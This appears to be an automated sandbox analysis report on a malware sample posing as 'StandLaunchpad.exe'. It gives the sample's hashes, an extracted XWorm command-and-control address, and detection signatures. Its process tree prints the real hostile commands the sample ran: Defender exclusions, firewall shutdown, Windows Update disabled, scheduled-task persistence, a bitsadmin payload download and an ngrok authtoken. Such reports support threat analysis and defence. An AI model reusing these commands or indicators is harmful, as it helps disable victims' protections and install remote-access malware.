Analysis
-
max time kernel
1046s -
max time network
1048s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08-04-2024 16:29
Static task
static1
Behavioral task
behavioral1
Sample
StandLaunchpad.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
StandLaunchpad.exe
Resource
win10v2004-20240226-en
General
-
Target
StandLaunchpad.exe
-
Size
134KB
-
MD5
313697746f04c39606c3c145f7585973
-
SHA1
cdf4242e9770e2df7194909c0f6682b7444d65a5
-
SHA256
62471479442943fbfae666403abfd0ccd02ed6d5be6bca01544cc887ca527c8d
-
SHA512
e8c7031fb50c04adffde20951c1dc5024651c03200ee119c9979538f34003123969fc2fbb7a31a05fcb94985cf612bc1bb6f33293e7399382c179c3566672b34
-
SSDEEP
3072:c/+WPWhShsl6gRnP5D4LKLh1T5g4+G0jhL:hnhsghhMLOh1TUjh
Malware Config
Extracted
xworm
127.0.0.1:22671
147.185.221.19:22671
-
Install_directory
%Temp%
-
install_file
Stand.exe
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/400-154-0x000000001B320000-0x000000001B32E000-memory.dmp disable_win_def -
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral2/files/0x000700000002320b-625.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000a0000000231de-6.dat family_xworm behavioral2/memory/400-15-0x0000000000410000-0x000000000042E000-memory.dmp family_xworm -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Stand.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Stand.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3904 netsh.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral2/files/0x000500000001db61-343.dat aspack_v212_v242 behavioral2/files/0x00080000000231bd-460.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation ltqgjj.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation StandLaunchpad.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Stand.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.exe -
Executes dropped EXE 29 IoCs
pid Process 400 Stand.exe 4308 Stand.exe 2992 Stand.exe 1144 Stand.exe 1552 Stand.exe 2816 Stand.exe 3280 Stand.exe 728 Stand.exe 2408 Stand.exe 1740 Stand.exe 3584 ngrok.exe 2788 Stand.exe 2036 Stand.exe 5044 Stand.exe 3532 lkdfcj.exe 4488 Stand.exe 3300 wqiviy.exe 4432 irgphv.exe 4116 Stand.exe 4048 duenba.exe 3008 csycab.exe 236 Stand.exe 2896 myarzu.exe 4488 yekovb.exe 4396 Stand.exe 3924 Stand.exe 3400 ltqgjj.exe 856 dlrarhsiva.exe 3900 Stand.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" Stand.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: yekovb.exe File opened (read-only) \??\E: yekovb.exe File opened (read-only) \??\G: yekovb.exe File opened (read-only) \??\J: yekovb.exe File opened (read-only) \??\Q: yekovb.exe File opened (read-only) \??\Y: yekovb.exe File opened (read-only) \??\I: yekovb.exe File opened (read-only) \??\T: yekovb.exe File opened (read-only) \??\U: yekovb.exe File opened (read-only) \??\M: yekovb.exe File opened (read-only) \??\O: yekovb.exe File opened (read-only) \??\P: yekovb.exe File opened (read-only) \??\A: yekovb.exe File opened (read-only) \??\B: yekovb.exe File opened (read-only) \??\H: yekovb.exe File opened (read-only) \??\K: yekovb.exe File opened (read-only) \??\L: yekovb.exe File opened (read-only) \??\R: yekovb.exe File opened (read-only) \??\S: yekovb.exe File opened (read-only) \??\W: yekovb.exe File opened (read-only) \??\X: yekovb.exe File opened (read-only) \??\N: yekovb.exe File opened (read-only) \??\V: yekovb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 114 raw.githubusercontent.com 115 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4024 sc.exe 4776 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2672 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 240 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 2800 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings StandLaunchpad.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-399997616-3400990511-967324271-1000\{3B6D0F43-875D-4F7C-8144-E3FAE9AC919A} yekovb.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1440 powershell.exe 1440 powershell.exe 2644 powershell.exe 2644 powershell.exe 2644 powershell.exe 344 powershell.exe 344 powershell.exe 344 powershell.exe 1876 powershell.exe 1876 powershell.exe 1876 powershell.exe 400 Stand.exe 400 Stand.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe 2944 StandLaunchpad.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 400 Stand.exe 4432 irgphv.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 400 Stand.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 344 powershell.exe Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 400 Stand.exe Token: SeDebugPrivilege 2944 StandLaunchpad.exe Token: SeDebugPrivilege 4308 Stand.exe Token: SeDebugPrivilege 2992 Stand.exe Token: SeDebugPrivilege 1144 Stand.exe Token: SeDebugPrivilege 1552 Stand.exe Token: SeDebugPrivilege 2816 Stand.exe Token: SeDebugPrivilege 3280 Stand.exe Token: SeDebugPrivilege 728 Stand.exe Token: SeDebugPrivilege 2408 Stand.exe Token: SeDebugPrivilege 1740 Stand.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 2788 Stand.exe Token: SeDebugPrivilege 2036 Stand.exe Token: SeDebugPrivilege 5044 Stand.exe Token: SeDebugPrivilege 4488 Stand.exe Token: SeDebugPrivilege 4116 Stand.exe Token: SeDebugPrivilege 236 Stand.exe Token: SeShutdownPrivilege 4488 yekovb.exe Token: SeCreatePagefilePrivilege 4488 yekovb.exe Token: 33 4920 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4920 AUDIODG.EXE Token: SeShutdownPrivilege 4488 yekovb.exe Token: SeCreatePagefilePrivilege 4488 yekovb.exe Token: SeShutdownPrivilege 4488 yekovb.exe Token: SeCreatePagefilePrivilege 4488 yekovb.exe Token: SeDebugPrivilege 4396 Stand.exe Token: SeDebugPrivilege 3924 Stand.exe Token: SeDebugPrivilege 3900 Stand.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 2896 myarzu.exe 4488 yekovb.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe 1008 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 400 Stand.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4656 wrote to memory of 400 4656 StandLaunchpad.exe 86 PID 4656 wrote to memory of 400 4656 StandLaunchpad.exe 86 PID 4656 wrote to memory of 3392 4656 StandLaunchpad.exe 87 PID 4656 wrote to memory of 3392 4656 StandLaunchpad.exe 87 PID 4656 wrote to memory of 3392 4656 StandLaunchpad.exe 87 PID 3392 wrote to memory of 240 3392 mshta.exe 90 PID 3392 wrote to memory of 240 3392 mshta.exe 90 PID 3392 wrote to memory of 240 3392 mshta.exe 90 PID 400 wrote to memory of 1440 400 Stand.exe 95 PID 400 wrote to memory of 1440 400 Stand.exe 95 PID 400 wrote to memory of 2644 400 Stand.exe 99 PID 400 wrote to memory of 2644 400 Stand.exe 99 PID 400 wrote to memory of 344 400 Stand.exe 101 PID 400 wrote to memory of 344 400 Stand.exe 101 PID 400 wrote to memory of 1876 400 Stand.exe 104 PID 400 wrote to memory of 1876 400 Stand.exe 104 PID 400 wrote to memory of 2672 400 Stand.exe 106 PID 400 wrote to memory of 2672 400 Stand.exe 106 PID 3392 wrote to memory of 2944 3392 mshta.exe 111 PID 3392 wrote to memory of 2944 3392 mshta.exe 111 PID 400 wrote to memory of 2800 400 Stand.exe 124 PID 400 wrote to memory of 2800 400 Stand.exe 124 PID 400 wrote to memory of 3584 400 Stand.exe 127 PID 400 wrote to memory of 3584 400 Stand.exe 127 PID 400 wrote to memory of 3584 400 Stand.exe 127 PID 400 wrote to memory of 3904 400 Stand.exe 130 PID 400 wrote to memory of 3904 400 Stand.exe 130 PID 400 wrote to memory of 4024 400 Stand.exe 132 PID 400 wrote to memory of 4024 400 Stand.exe 132 PID 400 wrote to memory of 4776 400 Stand.exe 134 PID 400 wrote to memory of 4776 400 Stand.exe 134 PID 3676 wrote to memory of 2640 3676 msedge.exe 150 PID 3676 wrote to memory of 2640 3676 msedge.exe 150 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 PID 3676 wrote to memory of 540 3676 msedge.exe 151 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\policies\system Stand.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Stand.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\AppData\Roaming\Stand.exe"C:\Users\Admin\AppData\Roaming\Stand.exe"2⤵
- UAC bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Creates scheduled task(s)
PID:2672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /im ngrok.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2TXGsZq2bw0qOMjyHoix51mIOUc_4EopY54VRHRpCya1jcRUn3⤵
- Executes dropped EXE
PID:3584
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3904
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wuauserv3⤵
- Launches sc.exe
PID:4024
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config wuauserv start=disabled3⤵
- Launches sc.exe
PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://exmple.com/3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9dc3746f8,0x7ff9dc374708,0x7ff9dc3747184⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:24⤵PID:1392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:34⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:84⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:14⤵PID:3588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:14⤵PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 /prefetch:84⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 /prefetch:84⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:14⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:14⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:14⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:14⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,8268648152477846239,2694988947017066698,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:24⤵PID:1360
-
-
-
C:\Users\Admin\AppData\Local\Temp\lkdfcj.exe"C:\Users\Admin\AppData\Local\Temp\lkdfcj.exe"3⤵
- Executes dropped EXE
PID:3532
-
-
C:\Users\Admin\AppData\Local\Temp\wqiviy.exe"C:\Users\Admin\AppData\Local\Temp\wqiviy.exe"3⤵
- Executes dropped EXE
PID:3300
-
-
C:\Users\Admin\AppData\Local\Temp\irgphv.exe"C:\Users\Admin\AppData\Local\Temp\irgphv.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\duenba.exe"C:\Users\Admin\AppData\Local\Temp\duenba.exe"3⤵
- Executes dropped EXE
PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\csycab.exe"C:\Users\Admin\AppData\Local\Temp\csycab.exe"3⤵
- Executes dropped EXE
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\myarzu.exe"C:\Users\Admin\AppData\Local\Temp\myarzu.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\yekovb.exe"C:\Users\Admin\AppData\Local\Temp\yekovb.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4488
-
-
C:\Users\Admin\AppData\Local\Temp\ltqgjj.exe"C:\Users\Admin\AppData\Local\Temp\ltqgjj.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3400 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"4⤵
- Executes dropped EXE
PID:856
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe3⤵
- Download via BitsAdmin
PID:240
-
-
C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
